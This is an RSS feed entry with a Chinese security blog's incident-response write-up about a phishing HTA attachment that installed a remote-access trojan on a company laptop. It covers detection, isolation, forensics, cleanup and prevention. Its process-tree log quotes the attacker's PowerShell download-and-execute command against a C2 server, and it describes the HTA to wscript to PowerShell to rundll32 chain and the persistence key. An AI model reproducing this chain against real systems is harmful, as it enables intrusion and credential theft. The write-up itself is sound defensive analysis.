<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>终端安全 on Zero Day Notes</title>
        <link>https://blog.5772447.xyz/tags/%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8/</link>
        <description>Recent content in 终端安全 on Zero Day Notes</description>
        <generator>Hugo -- gohugo.io</generator>
        <language>zh</language>
        <lastBuildDate>Thu, 14 Aug 2025 10:20:27 +0000</lastBuildDate><atom:link href="https://blog.5772447.xyz/tags/%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8/index.xml" rel="self" type="application/rss+xml" /><item>
            <title>钓鱼邮件致终端感染远控木马：溯源与处置</title>
            <link>https://blog.5772447.xyz/posts/2025-08-14-%E4%B8%80%E6%AC%A1%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6%E8%AF%B1%E5%AF%BC%E4%B8%8B%E8%BD%BD%E5%AF%BC%E8%87%B4%E7%BB%88%E7%AB%AF%E6%84%9F%E6%9F%93%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E7%9A%84%E6%8E%92%E6%9F%A5%E8%AE%B0%E5%BD%95/</link>
            <pubDate>Thu, 14 Aug 2025 10:20:27 +0000</pubDate>
            <guid>https://blog.5772447.xyz/posts/2025-08-14-%E4%B8%80%E6%AC%A1%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6%E8%AF%B1%E5%AF%BC%E4%B8%8B%E8%BD%BD%E5%AF%BC%E8%87%B4%E7%BB%88%E7%AB%AF%E6%84%9F%E6%9F%93%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E7%9A%84%E6%8E%92%E6%9F%A5%E8%AE%B0%E5%BD%95/</guid>
            <description>&lt;h2 id=&#34;一问题背景&#34;&gt;&lt;a href=&#34;#%e4%b8%80%e9%97%ae%e9%a2%98%e8%83%8c%e6%99%af&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;一、问题背景&#xD;&#xA;&lt;/h2&gt;&lt;p&gt;我司终端安全统一由 EDR（Endpoint Detection and Response，采用 CrowdStrike Falcon）纳管，全量约 2400 台办公终端均安装了轻量 Agent，开启行为检测与勒索防护。办公网通过域控下发组策略，约束软件安装与宏执行。网络侧有邮件安全网关（Mimecast）做反钓鱼与附件沙箱。&lt;/p&gt;&#xA;&lt;p&gt;2025-08-14 上午 09:51，EDR 控制台弹出一条&amp;quot;Malicious PowerShell Behavior&amp;quot;高危告警，涉及研发部员工 zhang.qiang 的笔记本（主机名 LAPTOP-ZQ，IP 10.20.35.77，OS Windows 11 23H2）。告警摘要指出该终端在数分钟内发起了与外网 C2 的可疑 HTTPS 通信，并伴随无文件 PowerShell 载荷执行。作为当班安全运维，我立即接入终端取证与隔离流程。&lt;/p&gt;&#xA;&lt;h2 id=&#34;二故障现象&#34;&gt;&lt;a href=&#34;#%e4%ba%8c%e6%95%85%e9%9a%9c%e7%8e%b0%e8%b1%a1&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;二、故障现象&#xD;&#xA;&lt;/h2&gt;&lt;p&gt;EDR 告警原文如下：&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;3&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;4&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;5&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;6&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;7&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;8&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[DETECT] Malicious PowerShell / C2 Beacon&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;主机: LAPTOP-ZQ (10.20.35.77)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;用户: DOMAIN\zhang.qiang&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;进程: powershell.exe (PID 8421) &amp;lt;- wscript.exe (PID 7990)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;行为: 下载并执行远程脚本 (IEX + Invoke-WebRequest)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;C2: 185.xx.xx.141:443 (NL, 伪装为 CDN)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;文件落地: %TEMP%\updater.dll&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;检测引擎: IOA (Indicator of Attack)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;同时观测到该终端：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;出口防火墙日志显示 09:48 起向 185.xx.xx.141 发起周期性 HTTPS 请求（约每 60 秒一次，典型信标心跳）。&lt;/li&gt;&#xA;&lt;li&gt;主机进程树出现 &lt;code&gt;wscript.exe → powershell.exe → rundll32.exe&lt;/code&gt; 的异常链路，且 rundll32 加载了临时目录下的 &lt;code&gt;updater.dll&lt;/code&gt;。&lt;/li&gt;&#xA;&lt;li&gt;zhang.qiang 反馈：早上收到一封&amp;quot;快递包裹异常&amp;quot;的钓鱼邮件，附件是 &lt;code&gt;package_notice.hta&lt;/code&gt;，双击后弹出&amp;quot;无法打开&amp;quot;的假错误，但之后电脑风扇转得厉害、偶有卡顿。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;基本判定：钓鱼 HTA 附件释放了远控木马（RAT），终端已沦为 C2 控制的肉鸡。&lt;/p&gt;&#xA;&lt;h2 id=&#34;三排查过程&#34;&gt;&lt;a href=&#34;#%e4%b8%89%e6%8e%92%e6%9f%a5%e8%bf%87%e7%a8%8b&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;三、排查过程&#xD;&#xA;&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;第一步：网络隔离，防止横向扩散。&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;在不关停主机、保留内存现场的前提下，先通过 EDR 一键&amp;quot;Network Containment&amp;quot;将终端从业务 VLAN 隔离到 quarantine 网段，仅保留与 EDR 控制台的通信：&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;EDR Action: Contain Host LAPTOP-ZQ&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Result: Success. Host isolated at 09:53. North-south traffic blocked.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;第二步：进程与文件溯源。&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;从 EDR 拉取进程树，还原攻击链：&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;3&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;4&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;5&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[1] outlook.exe (PID 5120) 打开附件 package_notice.hta&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[2] mshta.exe  (PID 7766) 解析 HTA，释放 %TEMP%\loader.js&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[3] wscript.exe(PID 7990) 执行 loader.js&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[4] powershell.exe (PID 8421) IEX(Invoke-WebRequest http://185.xx.xx.141/upd.bin)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;[5] rundll32.exe (PID 8602) 加载 %TEMP%\updater.dll (RAT 载荷)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;在终端上用 Autoruns 检查发现木马已写入启动项：&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;3&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Get-ItemProperty &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;HKCU:\Software\Microsoft\Windows\CurrentVersion\Run&amp;#34;&lt;/span&gt; |&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  Select-Object * | Format-List&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;# 输出含: Updater = &amp;#34;rundll32.exe %TEMP%\updater.dll,Start&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;第三步：IOC 提取与影响面排查。&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;提取本次 IOC：C2 域名/IP、落地文件哈希（SHA256）、HTA 样本。在 SIEM 中全网下发检索，确认仅 LAPTOP-ZQ 一台主机命中，未出现横向移动（该木马本身不含内网传播模块，但已尝试读取浏览器保存的密码与域凭证缓存）。&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;3&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;4&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;5&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;全网 IOC 命中扫描:&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  185.xx.xx.141        命中主机: 1 (LAPTOP-ZQ)&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  updater.dll SHA256   命中主机: 1&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;  package_notice.hta   命中主机: 1&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;结论: 单点失陷，无扩散。&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;h2 id=&#34;四解决方案&#34;&gt;&lt;a href=&#34;#%e5%9b%9b%e8%a7%a3%e5%86%b3%e6%96%b9%e6%a1%88&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;四、解决方案&#xD;&#xA;&lt;/h2&gt;&lt;p&gt;处置以&amp;quot;清除 + 凭证吊销 + 恢复&amp;quot;为主线：&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;&lt;strong&gt;终止恶意进程并删除持久化&lt;/strong&gt;：&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;div style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&#xA;&lt;table style=&#34;border-spacing:0;padding:0;margin:0;border:0;&#34;&gt;&lt;tr&gt;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;1&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;2&#xA;&lt;/span&gt;&lt;span style=&#34;white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f&#34;&gt;3&#xA;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#xA;&lt;td style=&#34;vertical-align:top;padding:0;margin:0;border:0;;width:100%&#34;&gt;&#xA;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Stop-Process -Name rundll32, powershell, wscript, mshta -Force&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Remove-ItemProperty -Path &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;HKCU:\Software\Microsoft\Windows\CurrentVersion\Run&amp;#34;&lt;/span&gt; -Name &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Updater&amp;#34;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Remove-Item &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;$env:TEMP&lt;span style=&#34;color:#e6db74&#34;&gt;\updater.dll&amp;#34;&lt;/span&gt;,&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;$env:TEMP&lt;span style=&#34;color:#e6db74&#34;&gt;\loader.js&amp;#34;&lt;/span&gt;,&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;$env:TEMP&lt;span style=&#34;color:#e6db74&#34;&gt;\package_notice.hta&amp;#34;&lt;/span&gt; -Force&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;ol start=&#34;2&#34;&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;strong&gt;吊销并重置凭证&lt;/strong&gt;：该终端曾登录过域账号，存在凭证缓存风险，强制 zhang.qiang 改密并使其所有 TGT 失效（&lt;code&gt;Set-ADAccountPassword&lt;/code&gt; + krbtgt 滚动待评估）；同时让其注销已登录的 Web 应用会话。&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;strong&gt;样本提交与封堵&lt;/strong&gt;：将 HTA/RAT 样本上传沙箱（ANY.RUN）做深度分析，提取 C2 域名加入防火墙与邮件网关黑名单；在 EDR 中创建自定义 IOC 阻止规则，全网阻断该哈希。&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;strong&gt;系统恢复&lt;/strong&gt;：由于 RAT 可能残留在系统目录，按安全规范不冒险&amp;quot;手工清理&amp;quot;，而是从标准镜像重装系统并还原个人数据（数据盘已隔离备份），确保彻底干净。&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;strong&gt;解除隔离与复盘&lt;/strong&gt;：恢复后解除 Network Containment，10:20 终端回归业务网，全程未影响其他员工。&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;h2 id=&#34;五根因分析&#34;&gt;&lt;a href=&#34;#%e4%ba%94%e6%a0%b9%e5%9b%a0%e5%88%86%e6%9e%90&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;五、根因分析&#xD;&#xA;&lt;/h2&gt;&lt;ol&gt;&#xA;&lt;li&gt;&lt;strong&gt;入口&lt;/strong&gt;：钓鱼邮件附件 &lt;code&gt;package_notice.hta&lt;/code&gt; 利用了 mshta.exe 可直接执行 HTA 脚本的特性，绕过了&amp;quot;禁用宏&amp;quot;的防护（HTA 不属于 Office 宏，组策略未限制）。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;载荷&lt;/strong&gt;：HTA 内嵌 JavaScript 经 wscript 调用 PowerShell 下载二次载荷，使用 &lt;code&gt;IEX&lt;/code&gt; 无文件执行规避磁盘查杀，再用 rundll32 加载 DLL 实现常驻，属于典型的&amp;quot;无文件 + 落地 DLL&amp;quot;混合技战术。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;短板&lt;/strong&gt;：终端组策略未禁用 mshta.exe 与脚本宿主（wscript/cscript）；邮件网关沙箱对 HTA 类附件的检出率不足；该员工安全意识培训覆盖不全。&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;h2 id=&#34;六预防措施&#34;&gt;&lt;a href=&#34;#%e5%85%ad%e9%a2%84%e9%98%b2%e6%8e%aa%e6%96%bd&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;六、预防措施&#xD;&#xA;&lt;/h2&gt;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;收紧脚本宿主&lt;/strong&gt;：通过 GPO 禁用 &lt;code&gt;mshta.exe&lt;/code&gt;、&lt;code&gt;wscript.exe&lt;/code&gt;、&lt;code&gt;cscript.exe&lt;/code&gt; 的非必要执行（或仅允许白名单路径），从源头掐断 HTA 执行链。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;强化邮件网关&lt;/strong&gt;：在 Mimecast 中对 &lt;code&gt;.hta/.js/.vbs/.scr&lt;/code&gt; 等危险扩展名直接剥离或隔离，并提升沙箱对无文件载荷的检出策略。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;攻击面收敛&lt;/strong&gt;：启用 EDR 的&amp;quot;脚本控制/PowerShell 约束语言模式&amp;quot;，对 &lt;code&gt;IEX + Invoke-WebRequest&lt;/code&gt; 这类组合做默认阻断。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;凭证保护&lt;/strong&gt;：推广 Windows Hello for Business 替代密码登录，降低终端缓存凭证被窃取的价值；启用 LSASS 受保护进程。&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;意识与演练&lt;/strong&gt;：将 HTA/快捷方式类钓鱼纳入季度钓鱼演练，对研发等高风险岗位增加专项培训。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;七总结&#34;&gt;&lt;a href=&#34;#%e4%b8%83%e6%80%bb%e7%bb%93&#34; class=&#34;header-anchor&#34;&gt;&lt;/a&gt;七、总结&#xD;&#xA;&lt;/h2&gt;&lt;p&gt;这是一次标准的&amp;quot;钓鱼 HTA → 无文件 PowerShell → DLL 远控&amp;quot;终端失陷事件。EDR 的行为检测（IOA）在攻击链早期就抓住了 PowerShell 异常，配合一键网络隔离，把影响牢牢限制在了单台终端，没有波及内网。最大的启示是：传统&amp;quot;基于文件哈希&amp;quot;的杀毒对无文件攻击几乎无效，必须依赖 EDR 的行为分析与快速 containment 能力；而 GPO 对 mshta/脚本宿主的禁用，则是性价比极高的一道前置防线。终端安全没有银弹，但&amp;quot;EDR 看得见 + 隔离快 + 策略收得紧 + 人训得到位&amp;quot;四件套，足以把绝大多数同类事件挡在可控范围内。&lt;/p&gt;&#xA;</description>
        </item></channel>
</rss>
